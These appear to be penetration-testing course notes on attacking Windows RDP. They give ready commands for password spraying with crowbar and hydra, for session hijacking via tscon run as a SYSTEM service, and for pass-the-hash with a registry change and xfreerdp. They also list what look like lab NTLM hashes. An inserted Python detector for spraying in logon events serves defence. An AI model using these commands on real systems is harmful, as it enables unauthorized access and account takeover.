<aside> 💡

One caveat on password guessing against Windows instances is that you should consider the client's password policy. In many cases, a user account will be locked or disabled after a certain number of failed login attempts. To avoid triggering that lockout, we can perform a specific password guessing technique called Password Spraying. This technique works by attempting a single password against many usernames before trying another password, keeping the number of failures per account below the lockout threshold.

</aside>

Using the Crowbar tool, we can perform a password spraying attack against the RDP service.

crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'

hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp
rdesktop -u admin -p password123 192.168.2.143
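From the defending side, the spraying pattern described above (one source, many distinct accounts, only a failure or two per account) is what stands out in failed-logon telemetry. The following is an added example, not part of the original notes: a small detector run over constructed Windows 4625-style failed-logon records (timestamp, source IP, target account), with the window and threshold values chosen as assumptions for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of failed-logon records (Event ID 4625 style): not real
# log data. One source tries a single password across many accounts; another
# source is one user mistyping their own password a few times.
SAMPLE_EVENTS = [
    ("2024-01-01T10:00:01", "192.168.220.140", "alice"),
    ("2024-01-01T10:00:02", "192.168.220.140", "bob"),
    ("2024-01-01T10:00:03", "192.168.220.140", "carol"),
    ("2024-01-01T10:00:04", "192.168.220.140", "dave"),
    ("2024-01-01T10:00:05", "192.168.220.140", "erin"),
    ("2024-01-01T10:00:06", "192.168.220.140", "frank"),
    ("2024-01-01T10:05:00", "192.168.220.150", "lewen"),
    ("2024-01-01T10:05:10", "192.168.220.150", "lewen"),
    ("2024-01-01T10:05:20", "192.168.220.150", "lewen"),
]


def detect_password_spray(events, window=timedelta(minutes=10), min_users=5):
    """Return {source_ip: (distinct_accounts, max_failures_per_account)} for
    every source whose failed logons inside any `window`-long span touch at
    least `min_users` distinct accounts. A low max_failures_per_account next
    to a high distinct_accounts count is the spraying signature: each account
    stays under the lockout threshold while the source cycles through users.
    Thresholds are illustrative assumptions, tune them to the environment."""
    by_source = defaultdict(list)
    for ts, src, user in events:
        by_source[src].append((datetime.fromisoformat(ts), user))

    flagged = {}
    for src, attempts in by_source.items():
        attempts.sort()  # sliding window needs chronological order
        for i, (start, _) in enumerate(attempts):
            per_user = defaultdict(int)
            for t, user in attempts[i:]:
                if t - start > window:
                    break
                per_user[user] += 1
            if len(per_user) >= min_users:
                flagged[src] = (len(per_user), max(per_user.values()))
                break  # one hit per source is enough to raise it
    return flagged


if __name__ == "__main__":
    for src, (users, per_user) in detect_password_spray(SAMPLE_EVENTS).items():
        print(f"possible spray from {src}: {users} accounts, "
              f"at most {per_user} failure(s) each")
```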

RDP Session Hijacking

To successfully impersonate a user without their password, we need to have SYSTEM privileges and use the Microsoft tscon.exe binary, which lets a user connect to another desktop session. It works by specifying the SESSION ID we want to connect to (4 for the lewen session in our example) and the session name it should be attached to (rdp-tcp#13, which is our current session).

tscon #{TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME}

A simple trick is to create a Windows service that, by default, will run as Local System and will therefore execute any binary with SYSTEM privileges. We will use the Microsoft sc.exe binary. First, we specify the service name (sessionhijack) and the binpath, which is the command we want to execute. Once we run the following command, a service named sessionhijack will be created.

whoami
query user
sc.exe create sessionhijack binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#13"
# To start the service and run the command
net start sessionhijack

RDP Pass-the-Hash (PtH)

There are a few caveats to this attack. One is that Restricted Admin mode must be enabled on the target; it is controlled by the DisableRestrictedAdmin registry value under the Lsa key, and setting it to 0 enables the mode:

**Adding the DisableRestrictedAdmin Registry Key**
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
xfreerdp /v:192.168.220.152 /u:lewen /pth:300FF5E89EF33F83A8146C10F5AB9BB9

Administrator:0E14B9D6330BF16C30B1924111104824
